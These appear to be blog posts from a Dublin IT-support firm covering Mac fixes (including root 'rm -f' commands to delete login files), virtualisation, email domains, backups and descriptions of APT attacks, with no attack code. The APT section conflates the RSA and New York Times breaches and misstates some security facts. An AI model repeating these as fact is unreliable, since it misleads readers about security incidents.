Great OWASP EU conference last week in Belfast highlighting some of the most dangerous IT security risks currently out there. Ironically, on the second day of this conference a lot of message alerts could be heard throughout the conference halls as news of the NHS cyber-attack attack was beginning to break.
In the mid 1980s, a Japanese psychiatrist working in France noticed a disproportionate number of his holidaying fellow countrymen and women being submitted to Paris hospitals with accelerated heart beats, shortness of breath and disorientation. After some investigations, he discovered that these tourists were in a state of shock. They had grown up all their lives with an idealised image of a city of beauty, culture and romance. But when they arrived, they discovered the reality was quite different. They found Paris to be noisy and unclean – at total variance with their idealised image of the city. He dubbed this condition “Paris Syndrome”. As a result, the Japanese embassy set up a helpline in Paris to assist their citizens experiencing this condition.
This sort of phenomenon is not restricted to Paris or iconic tourist locations. Over the last two to three years, we’ve seen this sort of inflated expectations happening with newbie Mac users. Individual users and business users buy Apple Macs with the expectation that, if they buy a Mac, all their computer woes will be over forever and ever in a fairytale-esque sort of way.
They buy an iMac or MacBook and bring it back to their office or home and then cannot understand what all the hype was about. And while they might not have accelerated heartbeats, shortness of breath or disorientation (well, maybe just a little bit…), they are in a mild state of disappointment that their computer problems have not magically disappeared. Some of these problems are pretty basic but very annoying. Take for example, a user who buys an expensive iMac system and discovers that is cannot maintain a stable connection to Wi-Fi, when their Windows system connected just fine. Or, the user who discovers that Mail.app keeps on losing connection to the IMAP server, resulting in emails that can neither be sent nor received. Or, they find that iCloud is continually misfiring with it comes to syncing data between devices. Or, they discover that with each OS X update, a plethora of frustrating side-effects is incurred. Or, they discover that the Spotlight search feature can’t seem to find anything. Or, they discover that the iWork office productivity suite which has so many bugs it in, it should feature in National Geographic magazine.
Just like Paris, Apple devices are really nice to look at. But they are certainly not perfect and don’t provide a computing utopia.
RealClear IT support are based in Dublin, Ireland and have been fixing Mac computers with love since 2003. Like fixing an old jalopy, fixing the quirks and foibles of Apple hardware and OS X software does actually grow on you! Most the problems mentioned above can be remedied.
Lately, many Mac users have been asking us about the best way to run Windows on their Apple Mac system. The Windows operating system is still needed by some users to run Windows applications that still cannot run natively on a Mac such as Sage 50 Accounts, Sage Instant Payroll, SolidWorks or Revit to name but just a few. So, rather than deploying both a Mac and Windows system, you can configure your Mac to run the two simultaneously whilst enjoying the best of both worlds.
Reaching dual-operating system nirvana
The two principal ways of reaching this dual operating system nirvana include using Apple’s native Bootcamp or third-party virtualisation software on your Mac such as VMware Fusion or Parallels. However, there are pros and cons to each approach. Going down the Bootcamp route means that each time your Mac is powered up, you will be presented with the option to boot into OS X (Mac) or Windows. This usually works fine. But for some users, it can be extremely time-consuming continually rebooting their Macs just to access their Windows partition from their Mac.
The virtualisation route
This is where VMware Fusion or Parallels virtualisation software come into play. Using these applications, you boot into OS X first and initialise Windows with the click of a button. Windows opens up from within your OS X operating system (in the same way that any Mac application would) negating the need to reboot your Mac. The virtualisation route offers slightly slower performance than using Bootcamp but running an application like Sage 50 Accounts the difference is barely perceptible.
Which is faster VMware Fusion or Parallels?
From our experience, the speed of VMware Fusion or Parallels can vary depending on what applications you intend running or whether you’re using a mechanical or SSD drive. Performance can also be determined by what version of the virtualisation software you’re using. A bit like a grape harvest, the performance offered by the two stalwarts of Apple virtualisation software varies from year to year. Some years VMware’s offering has the performance edge; other years Parallels offers a faster Windows-within-a-Mac experience.
Computer systems disconnecting from WiFi when trying to get some important work done can make for an extremely exasperating experience.
We recently helped a Dublin advertising agency with such a problem. Their iMacs and MacBooks would stay connected to their Virgin Media Thomson TWG870 WiFi router for hours. But as soon as their Macs went into sleep mode and transitioned to “normal” mode, the operating system would wake up but not the wireless connection leaving users in the office frustrated and cursing like sailors. Unfortunately, this is a glitch in many versions of OS X (10.8 – 10.12) which Apple have still not remedied successfully. However, in most cases, the solution is nice and simple.
This problem occurs because OS X seems to “forget” which wireless connection it had established before going into sleep mode. For example, there might be four of five wireless networks such as “hotel wifi”, “meeting room wifi”, “guest wifi” etc. stored in the network settings but upon waking from sleep mode OS X does not know which one to connect to. To remedy this, go to System Preferences > Network > WiFi > Advanced. Then go to the “Preferred Networks” panel and delete all networks listed here using the “-“ button, followed by “ok”.
Now go back into the Network panel and click on “Locations” followed by “Edit”. Click on the “+” and give your network location a new name like “New Office Network”. Click on “Done” followed by “Apply”. This helps to “lock in” a wireless network to your iMac or MacBook meaning that next time it goes into sleep mode it will not lose its wireless connection upon waking.
On follow-up a week later, all users were relieved to have a robust wireless connection. They could continue their work uninterrupted by internet blackouts or by swearing colleagues.
If you’re having wireless network problems with your Apple Mac in Dublin, RealClear are here to help. We work with most wireless networks including those from Virgin Media, Eir, Three, Vodafone and Magnet. You can contact RealClear on 01- 685 4833.
We are still shocked at the amount of business owners (legal professionals, consultants, etc.) who contact us about with problems with their indigo. IE or eircom.net email address. Whilst we can help these users to get their email fully operational again, using outdated domains such as indigo.ie as a professional email address is wrong for so many reasons!
1) The indigo.ie domain along with iol.ie were one of the first native email providers in Ireland when the internet started to become mainstream (1994 – 2000). (The eircom.net domain coming on stream circa 1999). The email service provided by these domains served a purpose back then for basic email but times have now changed. Most email services now need to support the IMAP protocol, which is needed for email on mobile devices.
2) Domains such as indigo.ie and iol.ie have long since changed hands from their original owners. Their new owners give these email domains only skeleton maintenance and support.
3) Using older domains like indigo.ie means you get very poor server-level spam filtering. This means a time-consuming nuisance to wade emails from Nigerian princes, but it also poses a security risk.
4) Using an indigo.ie or eircom.net email address does not project a professional image for your business.
5) You are at the mercy of their new owners. For example, the current owners of indigo.ie, Eir, might decide to pull the plug on indigo.ie any day leaving you in the lurch.
RealClear can help migrate your business to a more robust and reliable email platform which offers spam-filtering and higher levels of security
Most updates to the OS X operating system are trouble-free. However, a number of clients have recently contacted us informing us of a “blank screen and cursor” problem after they downloaded an update for OS X Sierra. Upon rebooting their iMac or MacBook they were greeted by a cursor and a blank screen. Not a sight you want to see when you just want to get some work done. The problem appears to be related to some “plist” and “Apple Upgrade” files going corrupt. Apple have not yet released a fix for this issue nor have they documented the issue in their knowledge base, but our solution is quite easy to implement.
1) Start your MacBook or iMac while holding the “Command” and “S” keys simultaneously.
2) After a minute or two you will be presented with a command line terminal screen. (This is a black screen where you can input commands)
3) Now type in the following commands in sequence.
/sbin/mount -uw /
rm -f /Library/Preferences/com.apple.loginwindow.plist
rm -f /var/db/.AppleUpgrade
Press enter after each command. After you’ve entered all commands successfully your MacBook or iMac should reboot and you should be back in business!
Last month RealClear IT Support attended the 44Con IT security conference in London. There were lots of interesting talks given, including those on threat intelligence, network security, application security, operating system attacks and hardware hacks.
But one of the consistent themes of the conference and one of the areas which is keeping CIOs awake at night is that of the Advanced Persistent Threat. APTs are targeted, persistent, multi-phased and sophisticated threats which operate in stealth mode on the modern computer network. Their ultimate goal is to exfiltrate data back from a business or organisation to the attacker’s “command and control” centre. This might sound all very X-files-like, but APTs have become a reality in today’s threat landscape. With traditional security defences in place, they can go unnoticed in your network for years.
One of the first high-profile APT attacks was discovered in 1998 when a computer technician at an American-based company ATI Corp identified a remote access connection on their network to a US Air Force base. The RAT (remote access Trojan) was initiated every morning at 3am. The technician reported his findings to law enforcement. A specialised team of military and information security specialists from the US government was mustered. After months of research, “Operation Moonlight Maze” found that several businesses and universities were being used extensively as proxies for attacks. Proxying RAT connections from local businesses and universities is much less suspicious than those from emanating from Russia or China. The attackers used Telnet and FTP to exfiltrate thousands of classified documents from US military sources.
Since these attacks, several other high profile APTs have been discovered including those which infected RSA (ironically a computer security company) and the New York Times. In 2011, RSA a leading provider of two-factor authentication security tokens to banks, finance and healthcare organisations, got hit by an APT. Like with Moonlight Maze, the FTP protocol was used exfiltrate files which compromised their SecureID system.
The New York Times was attacked by an APT in 2012 when their journalists started investigations into the relatives of Win Jiabao, the then Chinese prime minister. The threat went unnoticed for months. Corporate passwords for every journalist were stolen. Over 45 pieces of custom malware were installed. Their Symantec endpoint security software which the company was using to protect their PCs only identified one of these (which it quarantined).
Vectors of attack
One worrying aspect of the APT threat is the simplicity of their initial attack vector. For example, the RSA hack was traced back to just one phishing email sent to a member of their administrative staff. It contained an Excel worksheet which was completely blank except for an “X” letter in one of the spreadsheet’s cells. Out of curiosity the employee clicked on it, but nothing appeared to happen. Unbeknownst to them or the firm’s security team, the Excel sheet had an embedded Flash exploit called “Poison Ivy” which, when clicked, got activated and then connected to the attacker’s command-and-control server. A payload was then surreptitiously downloaded. This seemingly innocuous action gave the attackers the keys to the kingdom as it were. The compromised system was used as a launch pad for other attacks across the New York Times computer network.
There are several other examples of how APTs exploit a seemingly small vulnerability. The “Duqu” malware strain, discovered in September 2011 exploited a vulnerability with True Type font in a Microsoft Word document as the initial attack vector. The payload installs malware which subsequently connects to the attacker’s control and command servers via TCP ports 80 and 443 using a custom protocol. For port 80 bound traffic, Duqu uses steganography for encoding and attaching data to JPEG files. It uses XOR encryption to encrypt data captured by it’s keylogger. “Flame” is another piece of malware used in APT attacks. Discovered in 2012, it propagates via USB devices and a bogus Windows Update Service (a favourite strategy of the NSA also…). Having a paltry size of just 20MB, it can take screenshots, intercept email and activate PC microphones. It communications back to its command and control server over HTTP, HTTPS and SSH. Using such prosaic protocols makes it easy to slip under the radar of even the most sophisticated firewalls. Or consider “Red October” which steals information from iPhones by using SNMP brute forcing. Once installed, it collects data via a plugin for Microsoft Office and Adobe Reader. It evades detection by encrypting its main executable with XOR encryption. For initial infection, Red October uses infected Word and Excel documents for initial infection. These are then propagated via phishing attacks.
Implications for your business
Initially, most of these attacks did not use highly sophisticated approaches to hack their victims. They used what could be described as “everyday software” coupled with social engineering (phishing) to launch. In your business environment, there are some simple steps you can take to counter such threats.
Office and Adobe PDF documents should be opened with extreme prudence. Users should be trained to spot anomalous emails, attachments and know how to manage them securely.
You should be using the recent versions of Microsoft Office for maximum protection. For Microsoft Office 2010 (and later) each version has included “protected view” functionality which acts as a sandbox and allows documents from untrusted sources to opened in a safer way. Alternatively, you could use the free Libre Office suite, but this does not suit every business environment.
Antivirus products alone cannot be trusted as most of these still use signature-based scanning, which cannot detect zero-day vulnerabilities. The New York Times hack has shown us that 44 out of 45 strains of malware went undetected by their Symantec endpoint security software. Ancillary software like Java and Flash player should always be kept up-to-date.
All your operating systems should be fully patched and updated. This includes users of Mac OS X (many of whom still believe that “only Windows users get viruses”). Be suspicious of update requests that appear out-of-the-blue. You can manually update your OS or if you want to automate it a little you can use software like Personal Software Inspector from Flexera Software (Windows).
A stateful application-layer firewall should be used. These can be effective in detecting connections from anomalous servers and can detect custom protocols. Moreover, this type of firewall will drop encrypted traffic, which cannot be decoded.
A host-based intrusion detection (HIDS) will be much more effective than anti-virus solutions for detecting more sinister threats. These can perform log analysis, Windows registry monitoring and rootkit detection. Moreover, a HIDs will be more likely to detect malicious process injection from Office documents.
There is no magic bullet for IT security, but having a layered approach greatly enhances your security and reduces the risk of your systems being compromised.
Concerned about IT security? You can contact RealClear IT support in Dublin on 01 – 685 4833. Fast remote IT support nationwide. On-site IT support for the Dublin area. Practical and no-nonsense advice.
It has been said ad infinitum on this blog that data backup is one of the most important IT tasks you will ever perform in your business. Servers, desktops, laptops and tablets are all replaceable. Your data is not. But we keep seeing the same fundamental backup mistakes again and again. These leave your business wide open to data loss.
So, let’s get down to the brass tacks and look at some mindsets, assumptions and scenarios which lead to data loss.
1. The “I don’t have time to back-up” mindset held by some SME owners is short-sighted. If you perceive data backup taking up too much time, wait till you see how long it takes to recover from a catastrophic disk failure or a ransomware attack. A properly configured backup system should not take up any of your time. It will just run in the background automatically – minimal human intervention needed.
2. “We’re using mostly new computers here we don’t need to back-up”. Having the newest and shiniest IT equipment does not exempt you from backing up. Hard drive failure rates follow what is known as the “bathtub curve” of failure where the probability of failure is elevated in the first 12 months of a disk’s life. Moreover, cryptographic ransomware does not care how new your equipment is.
3. “Our IT support guy said all the data was being backed up to that box over there” We’ve been hearing this old chestnut for years. When you do check the timestamps of backups of “that box over there”, which is normally a server, NAS or external hard drive, you sometimes find that their backup is months out-of-date. The only thing “the box over there” was amassing was cobwebs.
4. The same phenomenon happens with the Cloud backup solutions, some SME owners will say “our data is being backed-up to the Cloud” as if some divine intervention is spiriting their data safely into the clouds. Your data needs to be verified, no matter how reputable you think your Cloud back-up service is. And on the subject of Cloud backup, it would be a good practice that on some idle Friday afternoon to perform a mock restoration of data. We have heard several horror stories of SMEs restoring from Cloud backup services only find all their data corrupted.
5. There are some still SME owners in Dublin who still are only performing local (i.e. not off-site) backups. While Dublin might not get tornadoes or severe lightning strikes, the risk of fire, burst pipes, flood, sabotage, theft and ransomware attacks is ever present.
6. With the multiplicity of data-holding devices such as smartphones, tablets, desktops, laptops, external drive and USB memory keys, data sprawl sets in. This results in many office environments having a hodge-podge of different data sets. This is why your data need to be categorised, prioritised and centralised.
7. Once you have your data categorised, your back-up plan should endeavour to back-up all data to a central file-server (hosted or local). Some SME owners (and some IT admins, alas) make the mistake of backing-up each system to a direct attached storage device. These devices (such as USB external drives) are then used to back up other systems. What results is a messy data sprawl, making reliable off-site back-up more difficult and data restoration processes more time consuming.
8. Some backup software vendors make a virtue of how comprehensive their backup products are. For example, their software might offer one hundred different ways to back-up. Complexity does not make backup software better or more reliable, it just elevates the risk of human error. Complex backup software is anathema to best backup practice simply because users hate using software that is designed like a tax form. Simple, easy-to-use backup software will trump complex software any day. Apple Time Machine is a classic example of this. When software becomes too complex to use, some users stop using it and will resort to drag n drop backup strategies with a USB memory stick…argh.
9. Encryption-based ransomware attacks have been a real game-changer in terms of backup system configuration. Some of the recent variants of ransomware have been extremely agile in propagating across networks from just one infected Mac or Windows system. Good backup systems are designed with such eventualities in mind and support versioning and backup set isolation.
10. Finally, it is important to remember that every IT set-up is constantly changing. Employees leave and new employees arrive. Hardware gets changed. Software gets changed. A good backup system should be flexible enough to be easily re-configured to allow for such changes.
Don’t have nightmares about data backup. RealClear IT Support is based in Dublin, Ireland. Our (local and hosted) backup systems are easy-to-use, reliable and secure. We also support Apple and Windows systems via our remote and on-site service. Call us on 01 685 4833 for some professional, experienced and practical advice.
The iPad has been a great boon for mobile computing, but unfortunately, it might not have all the files or applications needed to run your business. While it might do everything from web browsing to email, it will not run your Sage accountancy package or your AutoCAD design suite. This can be an inconvenience.
Picture the scene. You’re away from your office and for the sake of traveling light have only brought your iPad with you. But when on-site with a client you discover an important file needed for a presentation or meeting is residing back in your office on your iMac (or MacBook or Windows PC). This could mean making an SOS call to a colleague or family member to email you the file. Worst case scenario, you have to postpone your meeting. Neither of which solution is ideal.
Thankfully, Splashtop Business allows you to quickly and securely log in to your MacBook, iMac, Mac Mini or Windows system just using your iPad. The process is relatively easy. You install Splashtop on each system which you would like to access remotely (and of course on the iPad itself). When you need to log in, all it takes is a few clicks and you are virtually in front of your office computer. You can open up applications, make changes, perform file transfers and even video streaming. Data transmission is secured using end-to-end TLS 256-bit encryption and Splashtop is fully HIPPA compliant.
A very neat app which can save you time and potentially a lot of hassle.
A couple of weeks ago on 3rd April the world became aware of an alleged cyber-attack on the law firm of Mossack Fonseca in Panama. A couple of days later, it emerged that the attacker leaked over 2.6TB of data including over 4.8 million emails, 2.1 million .PDF files, 1.1 million images and 320,166 text files into the public domain. The files contained confidential financial information belonging to prominent politicians, actors, lawyers and business people.It was interesting to read the media coverage of this case. A lot of general media commentators cited the firms’ failure to update its WordPress and Drupal content management systems. While this did possibly contribute to the ease of access which the hacker(s) had, the roots of this hack lie a lot deeper.
Firstly, the data which Mossack Fonseca was holding was not encrypted. Given its confidentiality and headline worthiness, this was an egregious mistake. Storing confidential personally identifiable information in plain-text format is far from best practice. It should have been protected using AES whole-disk encryption or at a bare minimum stored using file-level encryption.
Next mistake was having a public-facing mail server dual-purposing as a document server. This means that a hacker having compromised their website could – with a little more work – hack into emails and then their documents. Easy peasy. Their mail server should have been in their DMZ protected by an external and internal firewall. The document server should have been put on an ultra-secure subnet, with stringent logging (monitored by experienced IT professionals who can spot anomalies quickly) and protected by an APT detection system.
Once they had their network structure secure, they could have then worried about the technicalities at the presentation and application layer of their network. Why was their email was not using TLS? Why was WordPress (with its one-click update function) or Drupal not updated? Why were their WordPress plugins not updated etc? (In other words, the stuff that Sky News talk about after there has been a cyber attack)
Lastly, for a business dealing with such confidential information of such prominent people, from media reports at least, there appeared to be a very low level of cyber-risk awareness present among senior or lower ranking staff. It might have just taken one employee to notice something was awry when 2.6TB of data was going into the ether.
As a result of failing to have a secure IT infrastructure and a cyber risk-aware culture in place, Mossack Fonseca got worldwide negative publicity and severe reputational damage to their business.